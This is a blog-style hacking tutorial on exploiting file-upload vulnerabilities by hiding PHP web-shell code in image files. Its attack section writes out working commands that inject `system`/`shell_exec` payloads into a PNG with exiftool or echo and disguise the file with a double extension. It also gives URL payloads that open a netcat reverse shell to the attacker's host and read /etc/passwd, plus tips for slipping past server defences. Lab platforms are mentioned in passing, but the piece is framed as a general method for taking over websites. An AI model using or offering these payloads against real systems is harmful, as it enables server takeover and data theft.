INTRO
It is a very serious vulnerability for any website. It can give you full shell access to the server. Recently, a person gained a nice amount by finding this bug on a website. It is possible for you to find this kind of vulnerability if you know how this vulnerability works and how can it be exploited.
But it is not so easy to exploit this vulnerability because today, we have a lot of ways to prevent this vulnerability. But it is found in some not so famous websites often. some webserver has functionality in which they don’t allow all general users to execute files. and some webservers changes the name of the uploaded file. where some webserver scans the file which is being uploaded.
well, the safest method is not to give execution permission to the user and change the name of the uploaded file. but a virus scan can be bypassed, not easily but yeah, it can be bypassed.
ATTACK
First, we will bind a reverse shell or some PHP code in an image. If you are reading articles on this website from starting, you might have already known about ExifTool. it is a tool which can inject some code in the image file(jpg/jpeg/png/gif).
∗To bind a reverse shell in a website, type this command:
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' imagefile.jpg
well, it is not a reverse shell. but we can execute a reverse shell with this which I will show you in a minute.
It can be done manually. and I would recommend you do this process with the manual method. In the manual method, We will create an image of any random colour. and then we will insert the PHP string in that file. It isn’t that hard as it seems. I am recommending this method because recently, I was to gain a shell of an HTB box where I used the ExifTool which didn’t work at all. I don’t know the reason why it didn’t work.
∗To create a Black Image:
convert -size 32x32 xc:white whatever.png
you can change the resolution and the colour and of course the name of the image file.
Now we will use the echo command to inject PHP code into the image:
echo '<?php echo shell_exec($_GET["cmd"]); ?>' >> whatever.png
remember to use >> instead of >. if you do this then the image content will be replaced by the PHP string.
∗Before going to upload it into a web server, we will rename the file:
mv whatever.png whatever.php.png
Now, you can upload it on a vulnerable platform like DVWA or bWapp. but just uploading a file won’t work. you will also have to execute it too. and remember that it is not a reverse shell but you can use it to run a reverse shell in the server.
∗If you want to run a reverse shell then the URL would be:
http://<IP>:<PORT>/whatever.png?cmd=nc <your-IP> <your listening PORT> -e "/bin/bash"
you can use some other reverse shell if the Netcat one doesn’t work. You can check out the list of the reverse shell here.
∗But if you want to see the /etc/passwd then the command would be:
http://<IP>:<PORT>/whatever.png?cmd=cat /etc/passwd
if the commands that you are typing aren’t working then you can URL encode those commands. It may work. But it always depends on the server. maybe, the server doesn’t allow us to execute files or it might have renamed our uploaded file with some random name.
Stay home, stay safe and keep reading our articles.
Thanks For Visiting
